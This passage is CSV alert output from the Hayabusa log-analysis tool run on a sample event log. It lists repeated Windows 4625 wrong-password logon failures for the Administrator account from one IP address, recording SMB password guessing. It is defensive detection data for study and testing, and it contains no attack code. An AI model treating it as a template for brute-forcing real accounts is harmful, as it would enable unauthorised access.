Type: 3 | Computer: e2v70poTOKPUNZJo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.673 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhzoOmgTrdvTS27z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.724 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pyvmBFGhKFgvzM9S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.772 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qHC0keHW2YsKeP02 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.801 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 29vkwuFa6njYc86s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.842 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s9687XPVHFiwttdm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.884 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: AcNGaeTqTydGinJE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.918 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dWRu7ZC1eo1nn0IQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.071 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M52CihyrQk9MOfCR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.134 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xBKSOZwS6f9ofXu7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.185 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uT1LHJs7kyeMmTtd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.237 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7FvZhetkdjnZOSpq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.284 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: 0DDC7WfL5T4d01yT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.330 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1dUzuddZH3Stespw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.376 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LKpORcDX0ccf1xMq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.408 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u4RbbKttCYPld8RR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.456 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: joni643cVcuBZH9K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.509 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bqY6TkW782CWKtvK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.545 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d8c1I63ULh17l0rN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.594 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cjOtMpWutC9qeSss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.650 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gmsFnerFYwXXe4Wt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.718 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rzIZ4vC0E2CYq5mc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.775 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0uZe50jJH0aj9xZi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.835 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LZM5UuxLymuAMJcw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:52:15.874 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iF1dq6UfuqpFpGkf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.938 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NQVTj9OLayvEg8dg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.987 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 98F9mULm7DsRUN49 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.047 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h6KjEOAdknvIMwOA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.096 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UHUu0OKm8fsHTnum | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.140 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esdoSyg6HkaSiJ0z | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.192 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M4lnVe7qNVEspxFV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.236 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Phei86bKte1UCbMi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.280 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ehA1LQ2Rs0Wts9JW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.318 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WcXtnkpww8HlSBb3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.372 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y8U7FrQZgDvQ09Uq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.430 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UgWwCtz3Gnoq9zYd | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.478 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mRNPwCogYrwSGeZf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.523 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6O9rWY8UGCbuhSwZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.552 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HuH4avUJ4AwqXTGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.617 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: japOFEaHgyT3T2fO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.657 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXpRMMNJRgjmd4km | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.706 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
gtTXA6BiiVyv42cj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.749 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wfYkwvNOfKj7rlTj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.805 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QzAZyceDjfmUOdz6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.849 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C0Qais0cF8avXJQ6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.940 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7KBM2fIEK6pEl7F2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.972 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N3stckaysFk58QAF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.017 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: oVK4S15DDLWISQ7i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.070 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fAA1bFLD5YMohS9q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.105 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k5V3sfIsj4kYtaGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.152 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IJw4MBG0cvIz2fMR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.196 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AXJ0UBfKCzLXJ5y0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.232 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z3A2mmYGcjHBbX3M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.268 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: oGlR6pBLnDrzMsqu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.316 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gv7nWzZ1HN9mgTya | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.418 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dnPUb3w2d7Ltif2E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.521 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GCWXdvBeDPpeKhWJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.576 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GN3OXSzQqLDF348i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.624 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AAWiBhYPNQ0RUuOX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.662 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: V5CBG3hblqr8kvWw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.706 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MDBaKpfYttm4H1gj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.743 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PNszt6piEznMlTdF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.789 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iqmBPOQIG6M1rZjX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.844 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BJs7tuZpsPMYJHOD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.880 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LUT5oe2DwS5vW84K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.928 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3OTe0uiDHhf5GzRL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.964 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 71TuxFRZFyZEQp1S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.008 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xRvTmizOLj3UUpD7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.044 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LnQEZPWaN2OkpTLa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.076 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HnHR9DAtgzu561sx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.128 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DfBl3dbluZ7GiFum | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:52:18.168 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Hlgn7gsZwRvlXAk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.212 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eyHVPtGpnmmRjJuO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.252 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F0l3QC0rLt9yGaIe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.289 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XfEng3JgXLmgI8GN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.334 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ORIegzlkHy8AX6RW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.377 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AzS4xRnHKxSwz5sZ | IP Addr: 192.168.198.149 | AuthPackage: 
